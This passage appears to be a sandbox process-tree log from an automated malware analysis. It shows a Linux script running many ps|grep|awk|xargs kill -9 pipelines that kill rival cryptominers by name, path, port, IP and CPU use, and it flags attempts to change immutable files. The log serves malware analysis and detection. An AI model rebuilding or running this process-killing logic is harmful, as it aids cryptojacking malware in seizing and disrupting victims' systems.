  xargs -I "%" kill -9 "%"
  2⤵
  PID:1776
- /bin/grep
  grep -v -
  2⤵
  PID:1775
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1774
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1773
- /bin/grep
  grep :6667
  2⤵
  PID:1772
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1782
- /bin/grep
  grep -v -
  2⤵
  PID:1781
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1780
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1779
- /bin/grep
  grep :7777
  2⤵
  PID:1778
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1788
- /bin/grep
  grep -v -
  2⤵
  PID:1787
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1786
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1785
- /bin/grep
  grep :8444
  2⤵
  PID:1784
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1794
- /bin/grep
  grep -v -
  2⤵
  PID:1793
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1792
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1791
- /bin/grep
  grep :3347
  2⤵
  PID:1790
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1800
- /bin/grep
  grep -v -
  2⤵
  PID:1799
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1798
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1797
- /bin/grep
  grep :14444
  2⤵
  PID:1796
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1806
- /bin/grep
  grep -v -
  2⤵
  PID:1805
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1804
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1803
- /bin/grep
  grep :14433
  2⤵
  PID:1802
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1812
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:1810
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1809
- /bin/grep
  grep -v -
  2⤵
  PID:1811
- /bin/grep
  grep :13531
  2⤵
  PID:1808
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1814
- /bin/cat
  cat /tmp/.X11-unix/01
  2⤵
  PID:1813
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1816
- /bin/cat
  cat /tmp/.X11-unix/11
  2⤵
  PID:1815
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1818
- /bin/cat
  cat /tmp/.X11-unix/22
  2⤵
  PID:1817
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1820
- /bin/cat
  cat /tmp/.pg_stat.0
  2⤵
  PID:1819
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1822
- /bin/cat
  cat /tmp/.pg_stat.1
  2⤵
  PID:1821
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1824
- /bin/cat
  cat /data/./oka.pid
  2⤵
  PID:1823
- /usr/bin/pkill
  pkill -f zsvc
  2⤵
  PID:1825
- /usr/bin/pkill
  pkill -f pdefenderd
  2⤵
  PID:1826
- /usr/bin/pkill
  pkill -f updatecheckerd
  2⤵
  PID:1827
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1832
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1831
- /bin/grep
  grep -v grep
  2⤵
  PID:1830
- /bin/grep
  grep ./oka
  2⤵
  PID:1829
- /bin/ps
  ps aux
  2⤵
  PID:1828
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1837
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1836
- /bin/grep
  grep -v grep
  2⤵
  PID:1835
- /bin/grep
  grep "postgres: autovacum"
  2⤵
  PID:1834
- /bin/ps
  ps aux
  2⤵
  PID:1833
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1848
- /bin/grep
  grep -v postgres
  2⤵
  PID:1845
- /bin/grep
  grep -v kinsing
  2⤵
  PID:1847
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1846
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1844
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1849
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1843
- /bin/grep
  grep -v "("
  2⤵
  PID:1842
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1841
- /bin/grep
  grep -v bin
  2⤵
  PID:1840
- /usr/bin/awk
  awk "length(\$1) == 8"
  2⤵
  PID:1839
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads CPU attributes
  PID:1838
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1860
- - /usr/local/sbin/kill
    kill -9 1253
    3⤵
    PID:1861
- - /usr/local/bin/kill
    kill -9 1253
    3⤵
    PID:1861
- - /usr/sbin/kill
    kill -9 1253
    3⤵
    PID:1861
- - /usr/bin/kill
    kill -9 1253
    3⤵
    PID:1861
- - /sbin/kill
    kill -9 1253
    3⤵
    PID:1861
- - /bin/kill
    kill -9 1253
    3⤵
    - Reads CPU attributes
    PID:1861
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1856
- /bin/grep
  grep -v postgres
  2⤵
  PID:1857
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1859
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1858
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1855
- /bin/grep
  grep -v "("
  2⤵
  PID:1854
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1853
- /bin/grep
  grep -v bin
  2⤵
  PID:1852
- /usr/bin/awk
  awk "length(\$1) == 16"
  2⤵
  PID:1851
- /bin/ps
  ps ax -o "command,pid" -www
  2⤵
  - Reads runtime system information
  PID:1850
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1872
- /usr/bin/awk
  awk "{print \$1}"
  2⤵
  PID:1871
- /bin/grep
  grep -v postgrey
  2⤵
  PID:1870
- /bin/grep
  grep -v postgres
  2⤵
  PID:1869
- /bin/grep
  grep -v proxymap
  2⤵
  PID:1868
- /bin/grep
  grep -v php-fpm
  2⤵
  PID:1867
- /bin/grep
  grep -v "("
  2⤵
  PID:1866
- /bin/grep
  grep -v "\\["
  2⤵
  PID:1865
- /bin/grep
  grep -v bin
  2⤵
  PID:1864
- /usr/bin/awk
  awk "length(\$5) == 8"
  2⤵
  PID:1863
- /bin/ps
  ps ax
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1862
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1877
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1876
- /bin/grep
  grep /tmp/sscks
  2⤵
  PID:1875
- /bin/grep
  grep -v grep
  2⤵
  PID:1874
- /bin/ps
  ps aux
  2⤵
  PID:1873
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1882
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1881
- /bin/grep
  grep -v grep
  2⤵
  PID:1880
- /bin/grep
  grep "sleep 60"
  2⤵
  PID:1879
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1878
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1887
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1886
- /bin/grep
  grep -v grep
  2⤵
  PID:1885
- /bin/grep
  grep ./crun
  2⤵
  PID:1884
- /bin/ps
  ps aux
  2⤵
  PID:1883
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1892
- /usr/bin/awk
  awk "{if(\$3>80.0) print \$2}"
  2⤵
  PID:1891
- /bin/grep
  grep -v grep
  2⤵
  PID:1890
- /bin/grep
  grep -vw kdevtmpfsi
  2⤵
  PID:1889
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1888
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1897
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1896
- /bin/grep
  grep :3333
  2⤵
  PID:1895
- /bin/grep
  grep -v grep
  2⤵
  PID:1894
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1893
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1902
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1901
- /bin/grep
  grep :5555
  2⤵
  PID:1900
- /bin/grep
  grep -v grep
  2⤵
  PID:1899
- /bin/ps
  ps aux
  2⤵
  PID:1898
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1907
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1906
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:1905
- /bin/grep
  grep -v grep
  2⤵
  PID:1904
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:1903
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1912
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1911
- /bin/grep
  grep log_
  2⤵
  PID:1910
- /bin/grep
  grep -v grep
  2⤵
  PID:1909
- /bin/ps
  ps aux
  2⤵
  PID:1908
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1917
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1916
- /bin/grep
  grep systemten
  2⤵
  PID:1915
- /bin/grep
  grep -v grep
  2⤵
  PID:1914
- /bin/ps
  ps aux
  2⤵
  PID:1913
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1922
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:1923
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:1923
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:1923
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:1923
- - /sbin/kill
    kill -9 14
    3⤵
    PID:1923
- - /bin/kill
    kill -9 14
    3⤵
    PID:1923
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1921
- /bin/grep
  grep netns
  2⤵
  PID:1920
- /bin/grep
  grep -v grep
  2⤵
  PID:1919
- /bin/ps
  ps aux
  2⤵
  PID:1918
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1928
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1927
- /bin/grep
  grep voltuned
  2⤵
  PID:1926
- /bin/grep
  grep -v grep
  2⤵
  PID:1925
- /bin/ps
  ps aux
  2⤵
  PID:1924
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1933
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1932
- /bin/grep
  grep darwin
  2⤵
  PID:1931
- /bin/grep
  grep -v grep
  2⤵
  PID:1930
- /bin/ps
  ps aux
  2⤵
  PID:1929
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1938
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1937
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:1936
- /bin/grep
  grep -v grep
  2⤵
  PID:1935
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1934
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1943
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1942
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:1941
- /bin/grep
  grep -v grep
  2⤵
  PID:1940
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1939
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1948
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1947
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:1946
- /bin/grep
  grep -v grep
  2⤵
  PID:1945
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1944
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1953
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1952
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:1951
- /bin/grep
  grep -v grep
  2⤵
  PID:1950
- /bin/ps
  ps aux
  2⤵
  PID:1949
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1958
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1957
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:1956
- /bin/grep
  grep -v grep
  2⤵
  PID:1955
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1954
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1963
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1962
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:1961
- /bin/grep
  grep -v grep
  2⤵
  PID:1960
- /bin/ps
  ps aux
  2⤵
  PID:1959
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1968
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1967
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:1966
- /bin/grep
  grep -v grep
  2⤵
  PID:1965
- /bin/ps
  ps aux
  2⤵
  PID:1964
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1973
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1972
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:1971
- /bin/grep
  grep -v grep
  2⤵
  PID:1970
- /bin/ps
  ps aux
  2⤵
  PID:1969
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1978
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1977
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:1976
- /bin/grep
  grep -v grep
  2⤵
  PID:1975
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1974
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1983
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1982
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:1981
- /bin/grep
  grep -v grep
  2⤵
  PID:1980
- /bin/ps
  ps aux
  2⤵
  PID:1979
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1988
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1987
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:1986
- /bin/grep
  grep -v grep
  2⤵
  PID:1985
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1984
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1993
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1992
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:1991
- /bin/grep
  grep -v grep
  2⤵
  PID:1990
- /bin/ps
  ps aux
  2⤵
  PID:1989
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1998
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1997
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:1996
- /bin/grep
  grep -v grep
  2⤵
  PID:1995
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1994
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2003
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2002
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:2001
- /bin/grep
  grep -v grep
  2⤵
  PID:2000
- /bin/ps
  ps aux
  2⤵
  PID:1999
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2008
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2007
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:2006
- /bin/grep
  grep -v grep
  2⤵
  PID:2005
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2004
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2013
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2012
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:2011
- /bin/grep
  grep -v grep
  2⤵
  PID:2010
- /bin/ps
  ps aux
  2⤵
  PID:2009
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2018
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2017
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:2016
- /bin/grep
  grep -v grep
  2⤵
  PID:2015
- /bin/ps
  ps aux
  2⤵
  PID:2014
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2023
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2022
- /bin/grep
  grep uiZvwxG8
  2⤵
  PID:2021
- /bin/grep
  grep -v grep
  2⤵
  PID:2020
- /bin/ps
  ps aux
  2⤵
  PID:2019
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2028
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2027
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2026
- /bin/grep
  grep -v grep
  2⤵
  PID:2025
- /bin/ps
  ps aux
  2⤵
  PID:2024
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2033
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2032
- /bin/grep
  grep BtwXn5qH
  2⤵
  PID:2031
- /bin/grep
  grep -v grep
  2⤵
  PID:2030
- /bin/ps
  ps aux
  2⤵
  PID:2029
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2038
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2037
- /bin/grep
  grep 3XEzey2T
  2⤵
  PID:2036
- /bin/grep
  grep -v grep
  2⤵
  PID:2035
- /bin/ps
  ps aux
  2⤵
  PID:2034
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2043
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2042
- /bin/grep
  grep t2tKrCSZ
  2⤵
  PID:2041
- /bin/grep
  grep -v grep
  2⤵
  PID:2040
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2039
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2048
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2047
- /bin/grep
  grep HD7fcBgg
  2⤵
  PID:2046
- /bin/grep
  grep -v grep
  2⤵
  PID:2045
- /bin/ps
  ps aux
  2⤵
  PID:2044
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2053
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2052
- /bin/grep
  grep zXcDajSs
  2⤵
  PID:2051
- /bin/grep
  grep -v grep
  2⤵
  PID:2050
- /bin/ps
  ps aux
  2⤵
  PID:2049
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2058
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2057
- /bin/grep
  grep 3lmigMo
  2⤵
  PID:2056
- /bin/grep
  grep -v grep
  2⤵
  PID:2055
- /bin/ps
  ps aux
  2⤵
  PID:2054
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2063
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2062
- /bin/grep
  grep AkMK4A2
  2⤵
  PID:2061
- /bin/grep
  grep -v grep
  2⤵
  PID:2060
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2059
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2068
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2067
- /bin/grep
  grep AJ2AkKe
  2⤵
  PID:2066
- /bin/grep
  grep -v grep
  2⤵
  PID:2065
- /bin/ps
  ps aux
  2⤵
  PID:2064
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2073
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2072
- /bin/grep
  grep HiPxCJRS
  2⤵
  PID:2071
- /bin/grep
  grep -v grep
  2⤵
  PID:2070
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2069
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2078
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2077
- /bin/grep
  grep http_0xCC030
  2⤵
  PID:2076
- /bin/grep
  grep -v grep
  2⤵
  PID:2075
- /bin/ps
  ps aux
  2⤵
  PID:2074
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2083
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2082
- /bin/grep
  grep http_0xCC031
  2⤵
  PID:2081
- /bin/grep
  grep -v grep
  2⤵
  PID:2080
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2079
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2088
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2087
- /bin/grep
  grep http_0xCC032
  2⤵
  PID:2086
- /bin/grep
  grep -v grep
  2⤵
  PID:2085
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2084
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2093
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2092
- /bin/grep
  grep http_0xCC033
  2⤵
  PID:2091
- /bin/grep
  grep -v grep
  2⤵
  PID:2090
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2089
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2098
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2097
- /bin/grep
  grep C4iLM4L
  2⤵
  PID:2096
- /bin/grep
  grep -v grep
  2⤵
  PID:2095
- /bin/ps
  ps aux
  2⤵
  PID:2094
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2103
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2102
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:2101
- /bin/grep
  grep -v grep
  2⤵
  PID:2100
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2099
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2107
- /usr/bin/awk
  awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
  2⤵
  PID:2106
- /bin/grep
  grep -v grep
  2⤵
  PID:2105
- /bin/ps
  ps aux
  2⤵
  PID:2104
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2112
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2111
- /bin/grep
  grep /boot/vmlinuz
  2⤵
  PID:2110
- /bin/grep
  grep -v grep
  2⤵
  PID:2109
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2108
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2117
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2116
- /bin/grep
  grep i4b503a52cc5
  2⤵
  PID:2115
- /bin/grep
  grep -v grep
  2⤵
  PID:2114
- /bin/ps
  ps aux
  2⤵
  PID:2113
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2122
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2121
- /bin/grep
  grep dgqtrcst23rtdi3ldqk322j2
  2⤵
  PID:2120
- /bin/grep
  grep -v grep
  2⤵
  PID:2119
- /bin/ps
  ps aux
  2⤵
  PID:2118
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2127
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2126
- /bin/grep
  grep 2g0uv7npuhrlatd
  2⤵
  PID:2125
- /bin/grep
  grep -v grep
  2⤵
  PID:2124
- /bin/ps
  ps aux
  2⤵
  PID:2123
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2132
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2131
- /bin/grep
  grep nqscheduler
  2⤵
  PID:2130
- /bin/grep
  grep -v grep
  2⤵
  PID:2129
- /bin/ps
  ps aux
  2⤵
  PID:2128
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2137
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2136
- /bin/grep
  grep rkebbwgqpl4npmm
  2⤵
  PID:2135
- /bin/grep
  grep -v grep
  2⤵
  PID:2134
- /bin/ps
  ps aux
  2⤵
  PID:2133
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2143
- - /usr/local/sbin/kill
    kill -9 1506
    3⤵
    PID:2144
- - /usr/local/bin/kill
    kill -9 1506
    3⤵
    PID:2144
- - /usr/sbin/kill
    kill -9 1506
    3⤵
    PID:2144
- - /usr/bin/kill
    kill -9 1506
    3⤵
    PID:2144
- - /sbin/kill
    kill -9 1506
    3⤵
    PID:2144
- - /bin/kill
    kill -9 1506
    3⤵
    PID:2144
- /usr/bin/awk
  awk "\$3>10.0{print \$2}"
  2⤵
  PID:2142
- /bin/grep
  grep "]"
  2⤵
  PID:2141
- /bin/grep
  grep -v aux
  2⤵
  PID:2140
- /bin/grep
  grep -v grep
  2⤵
  PID:2139
- /bin/ps
  ps aux
  2⤵
  PID:2138
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2149
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2148
- /bin/grep
  grep 2fhtu70teuhtoh78jc5s
  2⤵
  PID:2147
- /bin/grep
  grep -v grep
  2⤵
  PID:2146
- /bin/ps
  ps aux
  2⤵
  PID:2145
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2154
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2153
- /bin/grep
  grep 0kwti6ut420t
  2⤵
  PID:2152
- /bin/grep
  grep -v grep
  2⤵
  PID:2151
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2150
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2159
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2158
- /bin/grep
  grep 44ct7udt0patws3agkdfqnjm
  2⤵
  PID:2157
- /bin/grep
  grep -v grep
  2⤵
  PID:2156
- /bin/ps
  ps aux
  2⤵
  PID:2155
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2166
- /usr/bin/awk
  awk "length(\$11)>19{print \$2}"
  2⤵
  PID:2165
- /bin/grep
  grep -v _
  2⤵
  PID:2164
- /bin/grep
  grep -v -
  2⤵
  PID:2163
- /bin/grep
  grep -v /
  2⤵
  PID:2162
- /bin/grep
  grep -v grep
  2⤵
  PID:2161
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2160
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2171
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2170
- /bin/grep
  grep "\\[^"
  2⤵
  PID:2169
- /bin/grep
  grep -v grep
  2⤵
  PID:2168
- /bin/ps
  ps aux
  2⤵
  PID:2167
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2176
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2175
- /bin/grep
  grep rsync
  2⤵
  PID:2174
- /bin/grep
  grep -v grep
  2⤵
  PID:2173
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2172
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2181
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2180
- /bin/grep
  grep watchd0g
  2⤵
  PID:2179
- /bin/grep
  grep -v grep
  2⤵
  PID:2178
- /bin/ps
  ps aux
  2⤵
  PID:2177
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2186
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2185
